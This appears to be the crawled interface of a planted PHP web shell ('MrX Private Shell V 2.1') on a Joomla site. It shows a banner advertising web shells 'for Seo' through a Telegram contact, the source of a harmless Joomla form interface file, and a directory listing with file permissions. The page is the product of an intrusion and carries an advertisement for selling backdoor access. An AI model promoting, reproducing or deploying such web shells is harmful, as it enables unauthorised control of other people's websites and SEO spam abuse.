__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Joomla! Content Management System
*
* @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
namespace Joomla\CMS\Form;
// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects
/**
* Interface to be implemented by classes depending on a form factory.
*
* @since 4.0.0
*/
interface FormFactoryAwareInterface
{
/**
* Set the form factory to use.
*
* @param FormFactoryInterface $factory The form factory to use.
*
* @return FormFactoryAwareInterface This method is chainable.
*
* @since 4.0.0
*/
public function setFormFactory(FormFactoryInterface $factory);
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Field | Folder | 0775 |
|
|
| Filter | Folder | 0775 |
|
|
| Rule | Folder | 0775 |
|
|
| Form.php | File | 64.86 KB | 0664 |
|
| FormFactory.php | File | 982 B | 0664 |
|
| FormFactoryAwareInterface.php | File | 787 B | 0664 |
|
| FormFactoryAwareTrait.php | File | 1.38 KB | 0664 |
|
| FormFactoryInterface.php | File | 782 B | 0664 |
|
| FormField.php | File | 39.13 KB | 0664 |
|
| FormFilterInterface.php | File | 1.49 KB | 0664 |
|
| FormHelper.php | File | 16.31 KB | 0664 |
|
| FormRule.php | File | 3.23 KB | 0664 |
|